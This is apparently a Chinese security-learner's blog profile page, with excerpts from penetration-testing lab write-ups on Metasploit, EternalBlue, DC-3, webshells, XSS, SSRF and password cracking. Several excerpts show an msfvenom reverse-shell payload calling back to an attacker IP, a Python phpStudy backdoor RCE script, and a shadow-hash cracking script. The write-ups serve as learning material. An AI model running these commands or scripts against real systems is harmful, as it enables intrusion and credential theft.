自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(31)
  • 收藏
  • 关注

原创 简单的内网渗透实验

实验所需:kali一台,NAT模式。Win7一台,两张网卡,一张NAT,一张内网。Win2k3一台,NAT模式。Win2k8一台,NAT模式。简单的网络拓扑确认实验环境是否可以正常进行实验Win7:192.168.3.128为内网环境,192.168.40.154则为NAT(外网)环境。Win2k8Win2k31.信息收集通过各种方法搜集到IP,对其进行一个扫描sudo nmap -A -p- -sC -Pn -T4 ...

2021-11-06 13:50:44 879 2

原创 meterpreter下抓取windows系统明文密码实验

虚拟机:kali | Win7工具:msf1.生成工具msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.40.140 lport=55555 -f exe -o 233.exe这里需要注意的是IP地址以及端口。2.监听启动msf,选择模块,配置信息,监听。msf6 > use exploit/multi/handlerset payload windows/x64/met...

2021-11-04 20:32:27 4708

原创 永恒之蓝&Blue-keep

永恒之蓝主机:kali工具:msf版本:6.1.121.启用msfmsfconsole2.搜索漏洞编号search ms17-0103.选择use 3(扫描选择3)4.查看选项show options查看配置5.进行配置set RHOSTS 192.168.40.0/24指定扫描范围set THREADS 50指定线程run开始6. 开始扫描最左侧显示[-]是不可达到的最左侧显示[*]...

2021-11-03 21:28:40 372

原创 单双内网隧道技术实现

这里前提环境就不再赘述,详细可以观看上文。目标在内网,攻击者在公网,服务器是可以寻找到攻击者的。可以直接ping。这里需要借助一个工具:portmapcd ~/tools/portmap/./portmap -h如上图显示,则可以正常使用,否则需要更新或下载。使用方法也有说明。我们是等待对方发起连接,在12中选择一个。./portmap -m 2 -p1 2333 -p2 3389-m是使用的方法,后面则是将2333端口的流量转发到3389上,这是在...

2021-11-02 17:48:22 435 1

原创 DC-3靶机详细过程

1.搭建环境这里就不作详细描写,将kali和靶机搭建在同一网段即可。2.信息搜集2.1网段扫描nmap --script=vuln 192.168.40.135这里实验nmap对网段进行扫描,这里140是我本机,那靶机的IP是135且开放了80端口,尝试访问一下。2.2 80端口访问这里有一个登录界面,同时通过火狐的插件可以看到DC-3使用的CMS,这里是joomla。2.3 使用joomscan一款开源的OWASP Joomla漏洞扫描器searchsp..

2021-11-01 22:19:49 936

原创 Webshell的Windows提权

本文仅提供于学术探讨,如有后果自行承担。Webshell的Windows提权内网搭建

2021-10-30 16:50:55 1860

原创 反序列化漏洞&slor XXE漏洞

本文仅提供于学术探讨,如有后果自行承担。typecho反序列化漏洞Getshell复现1.搭建漏洞环境在搭建环境时,需要在数据库中建立于上图数据库名一样的库。2.安装成功显示上图则安装成功。3. 这里需要一个payload,(这个会挂在文章下面,自行参考)。在kali上去跑一下。4.在某狐浏览器使用hackbar来进行操作在url后需要追加一个?finish=,利用Post传参之前,需要加上一个__typecho_config=,再在后面加上在ka...

2021-10-28 22:21:58 296

原创 dedis&weblogic ssrf利用redis未授权反弹shell

本文仅提供于学术探讨,如有后果自行承担。redis数据库未授权访问漏洞复现启用漏洞环境借助工具来进行操作查看基本帮助weblogic ssrf利用redis未授权访问反弹shell

2021-10-27 17:29:24 445

原创 DAMICMS&METINFO漏洞复现

本文仅提供于学术探讨,如有后果自行承担。DAMI—5.4任意商品购买漏洞访问dami的网页先注册用户注册登录之后显示该页,直接选择上方的产品展示选择框中内容这里启动BP对该商品进行下单操作使用BP捕获到包具体如下将bp捕获到的包发送到repeater模块找到填写数量的参数对其进行修改重放提示交易成功,此时返回账户查看账户余额订单页面也有信息在体现页面看到账户余额位5400,这个上...

2021-10-26 17:42:49 2874 1

原创 CVE&nginx目录遍历复现

CVE-2017-15715CVE-2020-1938Nginx目录遍历

2021-10-25 22:30:21 1426

原创 Hydra&John的简单使用

目录Hydra爆破SS服务John爆破shadow文件在线破解在线(远程)口令破解,用户和密码需要提交到服务器,并认证。典型代表:网站后台 RDPSSH ...Hydra爆破SS服务首先需要一台开启ssh的机器,这里使用kali本机开启。接着启用Hydra可以使用hydra help来查看Hydra的操作方法。以下是常用的参数: 参数 含义 -R 接着上...

2021-10-23 16:27:08 2949 1

原创 PHPstudy PUT方法上传文件

要想开启PUT,需要修改PHPstudy的配置文件。根据路径打开配置文件,启用模块,记得对修改的模块备份启用模块添加目录根据自己的路径修改,记得保存,重启服务 ,可以通过BP抓取上传文件的包,对上传类型进行修改,也可通过kali自带的cadaver来实现通过help可以指定支持哪些命令使用lls是查看本机的文件,ls是查看服务器的文件,通过put上传一句话木马,使用蚁剑链接。蚁剑成功连接,而目录下也有1.phpmetinf...

2021-10-20 23:22:18 3299

原创 DVWA文件上传漏洞

low等级通过分析源代码,第一条只是分析上传是否为空,第二句则是文件的上传路径,第三条则是名字,可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。 如果上传成功,则会提示 路径+succesfully uploaded! 如果上传失败,则会提示 Your image was not uploaded。 我们尝试上传一个一句话木马 使用菜刀链接菜刀可以完全访问Medi...

2021-10-19 21:25:07 741

原创 固定会话与CSRFandXSS

1.固定会话练习xsspt的使用使用xsspt来生成语句,并将其插入到可能存在XSS漏洞的地方登录后台查看,cookie已经拿到利用获得的cookie登录document.cookie = 'username=admin'; document.cookie = 'userid=1'; document.cookie = 'PHPSESSID=qq5cdcqqiucfpde740eoghf1p3'; 对url进行修改,即可访问网站后台详细描...

2021-10-18 21:23:28 254

原创 SQL注入其他手法

宽字节宽字节GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。Cookie注入base64注入User-Agent注入Referer注入...

2021-10-16 00:24:21 118

原创 -扫描-.

启动OpenVAS添加目标添加策略添加任务扫描结束验证如:phpinfo()

2021-10-14 18:54:07 105

原创 DC-3靶机

主机发现扫描网段,看是否有主机存活。ping扫描发现DC-3的IP,对其进行端口扫描可以看到只开放了80端口,访问也可以对操作系统版本进行扫描,可以看到一些信息之后,利用软件对网站的url进行拼接看有无敏感路径和目录,这里使用御剑经过链接查看得出结果:主页面未找到空界面后台登录对于登录框,可以看一下采用的CMS版本,看有无漏洞,可以利用火...

2021-10-14 09:21:33 187

原创 使用vulhub 进行Apache httpd 目录穿越漏洞复现

使用GitHub下载kali内安装开启服务之后访问网站8080端口F12查看服务版本实验目录穿越漏洞在使用BP抓包后对GET进行修改,发送包,发现右侧回应400,bad request意思是“错误的请求";说明填写的url有问题,由于是url传承,需要将../进行url编码%2e=.%2f=/需要把%2f手动修改为/才可以如此一来,便就完成了Apache2.4.49目录遍历的复现,在url一栏可以查看任意文件,除了部分需要root权限...

2021-10-11 21:03:13 525

原创 简单的XSS

通过hackbar传参<script><script>alert(/xss/);</script>;</script>,发现页面只显示了alert(/xss/);,可能存在标签过滤,验证发现并无过滤,猜测可能是只过滤了<script>标签,尝试大写在修改其中的一个字母后,提交,成功触发。看一下源代码可以发现,在get接收到参数以后,进行了替换,将<script></script>替换成为...

2021-10-08 22:06:34 301

原创 PHP危险函数及漏洞复现

危险函数eval 语句:eval 会将符合php语法规范字符串当作php代码执行,能够实现简单的一句话木马,列如:但这里我们用Feng来进行中国菜刀连接。连接成功之后如下 能直接对对方服务器进行任何控制,assert()assert()同样会将字符串当做PHP 代码来执行。在网页中通过hackbar来操作,是可以执行系统命令,如下图preg_replace()这个函数的作用是对字符串进行正则匹配后替换,列如下图:preg_rep...

2021-09-29 22:25:46 804

原创 动态函数的基本应用

动态函数:这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。(官方)通过上述实验可以发现,在定义函数之后调用时,再调用ta时候,自定义函数的名字可以一致,但最后输出的结果并无冲突。再结合上面的官方回答,并不难理解。详细代码及结果:<meta charset = "utf-8"><?phpfunction foo(){ echo "都已经这样了,<br /></n>";}function fo(...

2021-09-28 17:00:56 1028

原创 php数组

多维数组的创建、数组的遍历:详细代码:<meta charset = 'utf-8'/><?php//使用array()语句结构将列表中所有数据声明为一个二维数组,默认下标是顺序数字索引 $contact1 = array( //定义外层数组 array('Feng_Blue','1','19','176'),//子数组1 array('Feng_Pink',.

2021-09-28 09:11:17 111

原创 可变变量、定义字符串、输出当前文件名字、其他运算符、if分支、switch语句、九九表。

可变变量:详细代码:<?php $i = 'Feng_Blue'; $Feng_Blue = 'Come On'; echo $i ; echo "<hr />" ; echo $$i ; $$i = 'I am a sidadi' ; echo "<hr />" ; echo $Feng_Blue ;?>结果:自定义字符串:单引号:详细代码:<?php $name = 'Feng_Blue';

2021-09-26 20:14:41 91

原创 自定义函数、验证函数使用、表单实现

自定义函数:详细代码: <script> var a = Number(prompt("请输入一个数字")); function qwq(){ for (var i = 0, l = 0; i<= a; i++){ l = l + i ; } return l;

2021-09-25 23:32:26 203

原创 js输出、循环、表格。

js代码在标签属性中详细代码:<html> <head> <title> - - 、</title> </head> <body> <input type="button" value="输出" onclick="console.log('jf');"> </body></html>运行结果:...

2021-09-23 20:07:53 737

原创 HTML 跨行表单、a标签实现网站导航、实现表单内容

import requestsimport base64import randomimport stringimport sysurl = "http://192.168.8.135/ll.php"def rce(url, cmd): cmd = base64.b64encode("system('{}');".format(cmd).encode()).decode() headers = { "Accept-Charset" : cmd, .

2021-09-22 21:41:07 393

原创 基于网站的漏洞测试

import base64import sysimport stringimport requestsimport randomurl = "http://192.168.8.135/ll.php"def rce(url,cmd): cmd = base64.b64encode("system('{}');".format(cmd).encode()).decode() headers = { "Accept-Charset" : cm...

2021-09-22 09:39:00 90

原创 21-09-17 爬虫、高阶

编写简单的爬虫脚本编写一个爬虫脚本:使用requests 模块获取网页内容;在网页内容中提取图片地址;将图片保存在文件中;------------------------------------------------------------------------------------------------首先捕获网页内容修改User-Agent信息查看图片名称获得图片地址将图片保存在文档中import requestsimport.

2021-09-17 23:39:13 109

原创 21.09.16 Python

import ospath = 'G:'for i in os.listdir(path): if os.path.isdir(os.path.join(path,i)): print("{} is a directory!".format(i)) f = open("E:\新建文件夹\pickle.txt","a") f.writelines(i +'\n' + "这是一个文件夹:") f.close else .

2021-09-16 21:49:17 97

原创 Linux爆破

import cryptpasswd = '$6$RmUUE1e.NhoDutKG$qnBFI2A5E0EAmBmib8dmE2GXx9oHLJnTV.yWbJm.0GzdGcOT2JP75B.iDa8Vw.ZJhVkFWFBkJpDjSa5c3YNbN/'f = open("pass.txt","r")_pass = ""for i in f : a = i.strip() _pass = crypt.crypt( a , "$6$RmUUE1e.NhoDutKG") if pass...

2021-09-15 23:19:54 211

原创 Python联系

将字符串转换为十六进制序列将字符串转换为十六进制将十六进制转化为字符串data = "abcdefhg"_data = ''for w in data : w = w.encode().hex() + ' ' _data += wprint(_data) #字符串转16a = bytes.fromhex("6162636465666867").decode()print(a)#16转字符串自动转换目录文件遍历遍历某一目录所有路径并..

2021-09-15 22:03:24 129 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除